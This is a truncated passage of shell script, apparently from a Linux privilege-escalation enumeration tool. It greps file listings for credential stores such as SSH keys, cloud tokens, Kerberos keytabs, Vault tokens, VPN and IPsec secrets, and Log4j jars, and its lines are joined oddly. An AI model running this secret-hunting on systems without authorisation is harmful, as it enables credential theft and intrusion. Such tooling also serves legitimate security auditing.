"$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) + PSTORAGE_RSYNC=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) + PSTORAGE_HOSTAPD=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_WIFI_CONNECTIONS=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/etc" | grep -E "system-connections$" | sort | uniq | head -n 70) + PSTORAGE_PAM_AUTH=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/etc" | grep -E "pam\.d$" | sort | uniq | head -n 70) + PSTORAGE_NFS_EXPORTS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/etc" | grep -E "exports$" | sort | uniq | head -n 70) + PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_RACOON=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) + PSTORAGE_KUBELET=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var" | grep -E "kubelet$|kube-proxy$" | sort | uniq | head -n 70) + PSTORAGE_VNC=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) + PSTORAGE_LDAP=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "ldap$" | sort | uniq | head -n 70) + PSTORAGE_LOG4SHELL=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/etc|^/private|^/usr|^/mnt|^/applications|^/cdrom|^/tmp|^/media|^/lib|^/sbin|^/var|^/bin|^$GREPHOMESEARCH|^/opt|^/.cache|^/lib64|^/snap|^/lib32|^/srv" | grep -E "log4j-core.*\.jar$" | sort | uniq | head -n 70) + PSTORAGE_OPENVPN=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) + PSTORAGE_SSH=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) + PSTORAGE_CERTSB4=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) + PSTORAGE_CERTSBIN=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) + PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) + PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/private|^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) + PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^$GREPHOMESEARCH|^/usr" | grep -E "ssh.*config$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) + PSTORAGE_KERBEROS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KIBANA=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_KNOCKD=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) + PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "logstash$" | sort | uniq | head -n 70) + PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.vault-token$" | sort | uniq | head -n 70) + PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "couchdb$" | sort | uniq | head -n 70) + PSTORAGE_REDIS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "redis\.conf$" | sort | uniq | head -n 70) + PSTORAGE_MOSQUITTO=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) + PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "neo4j$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_ERLANG=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) + PSTORAGE_GMV_AUTH=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IPSEC=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.irssi$" | sort | uniq | head -n 70) + PSTORAGE_KEYRING=$(echo -e 